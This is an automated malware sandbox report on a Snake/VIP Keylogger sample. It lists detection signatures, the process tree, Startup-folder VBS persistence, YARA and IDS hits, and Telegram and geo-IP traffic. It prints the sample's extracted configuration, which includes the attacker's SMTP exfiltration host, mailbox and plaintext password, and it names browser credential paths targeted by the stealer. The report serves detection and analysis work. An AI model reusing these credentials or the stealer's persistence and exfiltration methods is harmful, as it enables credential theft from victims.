
Windows Analysis Report
6cicUo3f8g.exe

Overview

General Information

Sample name: 6cicUo3f8g.exe (renamed because original name is a hash value)
Original sample name: f800b332a02989cb73f92d0b58f9658f7f5389be1a966670c507ccbd32c31ce7.exe
Analysis ID: 1588271
MD5: d721eab396039744df30c1c4ac89386e
SHA1: db06bcb42971088989f20c795e484611b37b35b0
SHA256: f800b332a02989cb73f92d0b58f9658f7f5389be1a966670c507ccbd32c31ce7
Tags: exe, MassLogger, user-adrian__luca

Detection

Snake Keylogger, VIP Keylogger
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Yara detected Generic Downloader
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • 6cicUo3f8g.exe (PID: 3428 cmdline: "C:\Users\user\Desktop\6cicUo3f8g.exe" MD5: D721EAB396039744DF30C1C4AC89386E)
    • toggeries.exe (PID: 5916 cmdline: "C:\Users\user\Desktop\6cicUo3f8g.exe" MD5: D721EAB396039744DF30C1C4AC89386E)
      • RegSvcs.exe (PID: 1672 cmdline: "C:\Users\user\Desktop\6cicUo3f8g.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • wscript.exe (PID: 6540 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • toggeries.exe (PID: 2184 cmdline: "C:\Users\user\AppData\Local\Thebesian\toggeries.exe" MD5: D721EAB396039744DF30C1C4AC89386E)
      • RegSvcs.exe (PID: 7076 cmdline: "C:\Users\user\AppData\Local\Thebesian\toggeries.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
404 Keylogger, Snake Keylogger | Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
{"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source | Rule | Description | Author | Strings
00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security
00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2dca0: $a1: get_encryptedPassword
  • 0x2e228: $a2: get_encryptedUsername
  • 0x2d913: $a3: get_timePasswordChanged
  • 0x2da2a: $a4: get_passwordField
  • 0x2dcb6: $a5: set_encryptedPassword
  • 0x309d2: $a6: get_passwords
  • 0x30d66: $a7: get_logins
  • 0x309be: $a8: GetOutlookPasswords
  • 0x30377: $a9: StartKeylogger
  • 0x30cbf: $a10: KeyLoggerEventArgs
  • 0x30417: $a11: KeyLoggerEventArgsEventHandler
Source | Rule | Description | Author | Strings
2.2.toggeries.exe.cd0000.1.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
2.2.toggeries.exe.cd0000.1.unpack | JoeSecurity_VIPKeylogger | Yara detected VIP Keylogger | Joe Security
2.2.toggeries.exe.cd0000.1.unpack | JoeSecurity_TelegramRAT | Yara detected Telegram RAT | Joe Security
2.2.toggeries.exe.cd0000.1.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
  • 0x2bea0: $a1: get_encryptedPassword
  • 0x2c428: $a2: get_encryptedUsername
  • 0x2bb13: $a3: get_timePasswordChanged
  • 0x2bc2a: $a4: get_passwordField
  • 0x2beb6: $a5: set_encryptedPassword
  • 0x2ebd2: $a6: get_passwords
  • 0x2ef66: $a7: get_logins
  • 0x2ebbe: $a8: GetOutlookPasswords
  • 0x2e577: $a9: StartKeylogger
  • 0x2eebf: $a10: KeyLoggerEventArgs
  • 0x2e617: $a11: KeyLoggerEventArgsEventHandler
2.2.toggeries.exe.cd0000.1.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
  • 0x3947e: $a2: \Comodo\Dragon\User Data\Default\Login Data
  • 0x38b21: $a3: \Google\Chrome\User Data\Default\Login Data
  • 0x38d7e: $a4: \Orbitum\User Data\Default\Login Data
  • 0x3975d: $a5: \Kometa\User Data\Default\Login Data

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , ProcessId: 6540, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs" , ProcessId: 6540, ProcessName: wscript.exe

Data Obfuscation

Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Thebesian\toggeries.exe, ProcessId: 5916, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\toggeries.vbs

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:19:18.688114+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49728 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:20.066545+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49740 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:26.879099+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49794 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:28.190658+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49807 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:33.598886+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49841 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:34.910911+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49851 | 104.21.32.1 | 443 | TCP
2025-01-10T23:19:40.191886+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49893 | 104.21.32.1 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:19:17.027297+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49716 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:17.996068+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49716 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:19.449161+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49734 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:32.058579+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49826 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:32.996111+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49826 | 132.226.247.73 | 80 | TCP
2025-01-10T23:19:34.355465+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.6 | 49845 | 132.226.247.73 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:19:29.119581+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 49811 | 149.154.167.220 | 443 | TCP
2025-01-10T23:19:43.713922+0100 | 1810007 | 1 | Potentially Bad Traffic | 192.168.2.6 | 61868 | 149.154.167.220 | 443 | TCP


AV Detection

Source: 00000007.00000002.2355329792.0000000003700000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: 7.2.toggeries.exe.3700000.1.raw.unpack | Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "cures@wxtp.store", "Password": "7213575aceACE@@", "Host": "mail.wxtp.store", "Port": "587", "Version": "4.4"}
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | ReversingLabs: Detection: 82%
Source: 6cicUo3f8g.exe | ReversingLabs: Detection: 82%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Joe Sandbox ML: detected
Source: 6cicUo3f8g.exe | Joe Sandbox ML: detected

Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: 6cicUo3f8g.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49722 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.6:49833 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49811 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:61868 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP | source: toggeries.exe, 00000002.00000003.2199979057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000002.00000003.2198284042.0000000003670000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2351747095.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2353097903.0000000003940000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: toggeries.exe, 00000002.00000003.2199979057.0000000003810000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000002.00000003.2198284042.0000000003670000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2351747095.00000000037A0000.00000004.00001000.00020000.00000000.sdmp, toggeries.exe, 00000007.00000003.2353097903.0000000003940000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094445A GetFileAttributesW, FindFirstFileW, FindClose | 0_2_0094445A
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094C6D1 FindFirstFileW, FindClose | 0_2_0094C6D1
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094C75C FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf | 0_2_0094C75C
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094EF95 SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose | 0_2_0094EF95
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094F0F2 SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose | 0_2_0094F0F2
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094F3F3 FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose | 0_2_0094F3F3
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_009437EF FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose | 0_2_009437EF
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_00943B12 FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose | 0_2_00943B12
Source: C:\Users\user\Desktop\6cicUo3f8g.exe | Code function: 0_2_0094BCBC FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose | 0_2_0094BCBC
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4445A GetFileAttributesW, FindFirstFileW, FindClose | 2_2_00B4445A
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4C6D1 FindFirstFileW, FindClose | 2_2_00B4C6D1
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4C75C FindFirstFileW, FindClose, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToLocalFileTime, FileTimeToSystemTime, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf, __swprintf | 2_2_00B4C75C
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4EF95 SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, GetFileAttributesW, SetFileAttributesW, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose | 2_2_00B4EF95
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4F0F2 SetCurrentDirectoryW, FindFirstFileW, FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose, FindFirstFileW, SetCurrentDirectoryW, _wcscmp, _wcscmp, SetCurrentDirectoryW, SetCurrentDirectoryW, FindNextFileW, FindClose, FindClose | 2_2_00B4F0F2
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4F3F3 FindFirstFileW, Sleep, _wcscmp, _wcscmp, FindNextFileW, FindClose | 2_2_00B4F3F3
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B437EF FindFirstFileW, DeleteFileW, DeleteFileW, MoveFileW, DeleteFileW, FindNextFileW, FindClose, FindClose | 2_2_00B437EF
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B43B12 FindFirstFileW, DeleteFileW, FindNextFileW, FindClose, FindClose | 2_2_00B43B12
Source: C:\Users\user\AppData\Local\Thebesian\toggeries.exe | Code function: 2_2_00B4BCBC FindFirstFileW, _wcscmp, _wcscmp, FindNextFileW, FindClose | 2_2_00B4BCBC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 010AF8E9h | 3_2_010AF631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 010AFD41h | 3_2_010AFA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05857A5Dh | 3_2_05857720
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05858E28h | 3_2_05858B58
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585E856h | 3_2_0585E588
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585C866h | 3_2_0585C598
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05856869h | 3_2_058565C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 058518A1h | 3_2_058515F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05850FF1h | 3_2_05850D48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05850741h | 3_2_05850498
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov esp, ebp | 3_2_0585AC31
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov esp, ebp | 3_2_0585AC40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585DF36h | 3_2_0585DC68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585BF46h | 3_2_0585BC78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05855A29h | 3_2_05855780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585FA96h | 3_2_0585F7C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585DAA6h | 3_2_0585D7D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585BAB6h | 3_2_0585B7E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05852A01h | 3_2_05852758
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05852151h | 3_2_05851EA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585F176h | 3_2_0585EEA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585D186h | 3_2_0585CEB8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585B196h | 3_2_0585AEC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05855179h | 3_2_05854ED0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 058548C9h | 3_2_05854620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05857119h | 3_2_05856E70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05851449h | 3_2_058511A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05854471h | 3_2_058541C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585C3D6h | 3_2_0585C108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05850B99h | 3_2_058508F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585E3C6h | 3_2_0585E0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 058532B1h | 3_2_05853008
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 058562DBh | 3_2_05856030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 058502E9h | 3_2_05850040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05852E59h | 3_2_05852BB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05855E81h | 3_2_05855BD8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 058525A9h | 3_2_05852300
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 058555D1h | 3_2_05855328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585F606h | 3_2_0585F338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585D616h | 3_2_0585D348
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585B626h | 3_2_0585B358
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05857571h | 3_2_058572C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05856CC1h | 3_2_05856A18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585ECE6h | 3_2_0585EA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0585CCF6h | 3_2_0585CA28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05851CF9h | 3_2_05851A50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05854D21h | 3_2_05854A78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0089F8E9h | 8_2_0089F630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 0089FD41h | 8_2_0089FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FD31E0h | 8_2_05FD2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FD2C19h | 8_2_05FD2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FD0D0Dh | 8_2_05FD0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FD1697h | 8_2_05FD0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDE501h | 8_2_05FDE258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FD31E0h | 8_2_05FD2DBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDDC51h | 8_2_05FDD9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDD7F9h | 8_2_05FDD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FD31E0h | 8_2_05FD310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDD3A1h | 8_2_05FDD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDCF49h | 8_2_05FDCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 8_2_05FD0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 8_2_05FD0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDFAB9h | 8_2_05FDF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDF661h | 8_2_05FDF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDF209h | 8_2_05FDEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDEDB1h | 8_2_05FDEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDE959h | 8_2_05FDE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h | 8_2_05FD0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 4x nop then jmp 05FDE0A9h | 8_2_05FDDE00

Networking

                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49811 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:61868 -> 149.154.167.220:443
                Source: unknownDNS query: name: api.telegram.org
                Source: unknownDNS query: name: api.telegram.org
                Source: Yara matchFile source: 3.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.toggeries.exe.cd0000.1.raw.unpack, type: UNPACKEDPE
